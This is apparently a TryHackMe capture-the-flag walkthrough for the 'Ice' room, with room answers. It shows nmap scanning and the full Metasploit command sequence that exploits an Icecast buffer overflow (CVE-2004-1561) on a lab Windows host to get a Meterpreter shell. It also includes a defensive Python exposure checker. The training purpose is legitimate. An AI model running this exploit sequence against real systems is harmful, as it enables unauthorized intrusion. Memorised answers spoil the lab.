Deploy & hack into a Windows machine, exploiting a very poorly secured media server.
🔴 Important: rename the VPN file to match your TryHackMe account username.
Click Access Machine --> OpenVPN (how to connect and configure the VPN)
Scan and enumerate our victim!
Answer the questions below
Deploy the machine! This may take up to three minutes to start.
No answer needed
Launch a scan against our target machine. I recommend using a SYN scan set to scan all ports on the machine. The scan command will be provided as a hint; however, it's recommended to complete the room 'Nmap' prior to this room.
No answer needed
Once the scan completes, we'll see a number of interesting ports open on this machine. As you might have guessed, the firewall has been disabled (with the service completely shutdown), leaving very little to protect this machine. One of the more interesting ports that is open is Microsoft Remote Desktop (MSRDP). What port is this open on?
3389
Command (substitute the IP of your deployed target machine):
sudo nmap -sT -sV -O -Pn 10.10.254.30
What service did nmap identify as running on port 8000? (First word of this service)
Icecast
Enumerate the service on 8000/tcp with the command below (a version scan, not the exploit itself):
sudo nmap -sT -sV -O -Pn -p 8000 10.10.95.145
Output:
What does Nmap identify as the hostname of the machine? (All caps for the answer)
DARK-PC
Open Metasploit:
msfconsole
search icecast
use exploit/windows/http/icecast_header
options
set rhosts 10.10.95.145
set lhost 10.8.83.18 (your VPN tun0 IP)
exploit
Once the Meterpreter session opens, run sysinfo:
meterpreter > sysinfo
The output includes the hostname.
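As an added example (not part of the walkthrough), here is a small Python checker that parses nmap grepable output (-oG) and flags the two exposures this scan surfaces, RDP on 3389 and Icecast on 8000, the way a defender reviewing the same scan would. The sample scan text, the rule table and the remediation wording are constructed assumptions, not output from the room.

```python
from dataclasses import dataclass

# Constructed sample of nmap grepable (-oG) output, modelled on the scan in
# this walkthrough; it is not real output captured from the room.
SAMPLE_GNMAP = """# Nmap scan initiated (constructed sample)
Host: 10.10.95.145 ()\tStatus: Up
Host: 10.10.95.145 ()\tPorts: 135/open/tcp//msrpc///, 3389/open/tcp//ms-wbt-server//Microsoft Terminal Services/, 8000/open/tcp//http//Icecast streaming media server/\tIgnored State: closed (997)
# Nmap done (constructed sample)
"""

@dataclass
class PortRecord:
    host: str
    port: int
    state: str
    proto: str
    service: str
    version: str

# Exposure rules (assumed, defender-side) for the findings the room surfaces:
# RDP reachable from the network and an Icecast server on 8000/tcp.
RULES = [
    ("rdp_exposed", lambda p: p.port == 3389 and p.state == "open",
     "RDP reachable and the host firewall is off; restrict 3389 at the network edge"),
    ("icecast_exposed", lambda p: p.port == 8000 and "icecast" in p.version.lower(),
     "Icecast reachable on 8000/tcp; compare its version with CVE-2004-1561 on cvedetails and patch or retire it"),
]

def parse_gnmap(text):
    """Return one PortRecord per entry in the 'Ports:' section of each host line.
    Assumes the -oG field layout port/state/proto/owner/service/rpcinfo/version
    and that version strings contain no commas."""
    records = []
    for line in text.splitlines():
        if not line.startswith("Host:") or "Ports:" not in line:
            continue                      # skip comments and 'Status:' lines
        host = line.split()[1]
        ports_field = line.split("Ports:", 1)[1].split("\t", 1)[0]
        for entry in ports_field.split(","):
            fields = entry.strip().split("/")
            if len(fields) < 7:
                continue
            records.append(PortRecord(host, int(fields[0]), fields[1], fields[2], fields[4], fields[6]))
    return records

def assess(records):
    """Return (rule_name, host, port, advice) for every record matching an exposure rule."""
    return [(name, r.host, r.port, advice) for r in records for name, match, advice in RULES if match(r)]

if __name__ == "__main__":
    for finding in assess(parse_gnmap(SAMPLE_GNMAP)):
        print(finding)
```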
Exploit the target vulnerable service to gain a foothold!
Answer the questions below
Now that we've identified some interesting services running on our target machine, let's do a little bit of research into one of the weirder services identified: Icecast. Icecast, or at least the version running on our target, is heavily flawed and has a high-severity vulnerability with a score of 7.5 (7.4 depending on where you view it). What type of vulnerability is it? Use https://www.cvedetails.com for this question and the next.
execute code overflow
Visit https://www.cvedetails.com and search for icecast.
Choose 'Icecast : Security vulnerabilities'.
What is the CVE number for this vulnerability? This will be in the format: CVE-0000-0000
CVE-2004-1561
Now that we've found our vulnerability, let's find our exploit. For this section of the room, we'll use the Metasploit module associated with this exploit. Let's go ahead and start Metasploit using the command msfconsole
No answer needed
After Metasploit has started, let's search for our target exploit using the command 'search icecast'. What is the full path (starting with exploit) for the exploitation module? This module is also referenced in 'RP: Metasploit' which is recommended to be completed prior to this room, although not entirely necessary.
exploit/windows/http/icecast_header
Let's go ahead and select this module for use. Type either the command use icecast or use 0 to select our search result.
No answer needed
After selecting our module, we now have to check what options we have to set. Run the command show options. What is the only required setting which currently is blank?
rhosts
First let's check that the LHOST option is set to our tun0 IP (which can be found on the access page). With that done, let's set that last option to our target IP. Now that we have everything ready to go, let's run our exploit using the command exploit
No answer needed